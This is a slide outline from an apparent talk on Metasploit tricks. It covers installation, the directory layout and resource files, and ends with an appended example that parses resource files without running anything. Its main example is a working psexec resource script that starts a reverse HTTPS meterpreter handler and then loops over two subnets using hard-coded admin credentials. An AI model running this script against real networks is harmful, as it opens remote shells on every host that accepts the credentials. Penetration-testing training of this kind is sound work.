Metasploit Magic: the dark corners of the framework


  1. Metasploit Magic: a little sleight of hand
  2. But first...
  3. Installing Metasploit: `svn co https://metasploit.com/svn/trunk msf`
  4. not... here
  5. ESPECIALLY not here
  6. it is a SYN
  7. SRSLY!
  8. here is ok ;-)
  9. and remember... this isn't the only place you can install it...
  10. Directory structure (top level of the checkout): HACKING, README, armitage, data, documentation, external, lib, modules, plugins, scripts, tools, bins, psexec.rc, msfcli, msfconsole, msfd, msfelfscan, msfencode, msfgui, msfmachscan, msfopcode, msfpayload, msfpescan, msfrpc, msfrpcd, msfupdate
  11. `~/.msf3/`: history, logs, loot; `msfconsole.rc` (YOUR SETTINGS); `modules` (YOUR MODULES)
  12. Resource files: a script executed line by line; can also contain Ruby; works for meterpreter sessions now! Load with `./msfconsole -r psexec.rc` or `msf> resource psexec.rc`
  13. psexec scanner (`psexec.rc`):

```
use multi/handler
setg PAYLOAD windows/meterpreter/reverse_https
setg LHOST 192.168.1.100
setg LPORT 443
set ExitOnSession false
exploit -j -z

use windows/smb/psexec
set SMBUser AdminBob
set SMBPass ThisPasswordSucks
set SMBDomain .
set DisablePayloadHandler true

<ruby>
require 'rex/socket/range_walker'
rhosts = '10.10.10.0/24,10.10.14.0/24'
iplist = Rex::Socket::RangeWalker.new(rhosts)
iplist.each do |rhost|
  self.run_single("set RHOST #{rhost}")
  self.run_single("exploit -j -z")
end
</ruby>
```
  17. magic: `use .*psexec`
  18. other fun...: `script`; `color = false`; `screen`
  19. `meterpreter> guid`; twitter.com/mubix; mubix[hak5.org]
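To make the resource-file mechanism from slides 12 and 13 concrete, here is an added example (not Metasploit's code and not from the deck) that models how msfconsole consumes a `.rc` file: plain lines become console commands run one at a time, and text between `<ruby>` and `</ruby>` is evaluated as Ruby with the console as `self`, so the block can call `run_single`. The `FakeConsole` class, its recording `run_single`, and the sample resource text are assumptions; a plain host list stands in for `Rex::Socket::RangeWalker`, and nothing is executed, only recorded.

```ruby
# Added example: a minimal model of how msfconsole loads a resource file.
# Plain lines are console commands; <ruby>...</ruby> blocks are evaluated
# with the console as self. Not Metasploit's code: it only records commands.
class FakeConsole
  attr_reader :commands
  def initialize
    @commands = []
  end
  # Stand-in for msfconsole's run_single: record instead of executing.
  def run_single(line)
    @commands << line.strip
  end
  # Walk the resource text line by line; buffer <ruby> blocks until </ruby>.
  def load_resource(text)
    ruby_buf = nil
    text.each_line do |raw|
      line = raw.chomp
      if ruby_buf
        if line.strip == '</ruby>'
          instance_eval(ruby_buf.join("\n"), 'resource', 1)
          ruby_buf = nil
        else
          ruby_buf << line
        end
      elsif line.strip == '<ruby>'
        ruby_buf = []
      elsif line.strip.empty? || line.lstrip.start_with?('#')
        next # blank lines and comments are skipped
      else
        run_single(line)
      end
    end
    raise 'unterminated <ruby> block' if ruby_buf
    @commands
  end
end
# Constructed sample in the shape of the psexec.rc slide, with a plain
# host list standing in for Rex::Socket::RangeWalker.
SAMPLE_RC = <<~'RC'
  setg LHOST 192.168.1.100
  # handler options
  set ExitOnSession false
  <ruby>
  ['10.10.10.5', '10.10.10.6'].each do |rhost|
    self.run_single("set RHOST #{rhost}")
  end
  </ruby>
RC
```

Running `FakeConsole.new.load_resource(SAMPLE_RC)` returns the four commands in the order the console would have run them, which is a convenient way to dry-run a resource file before feeding it to `msfconsole -r`.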
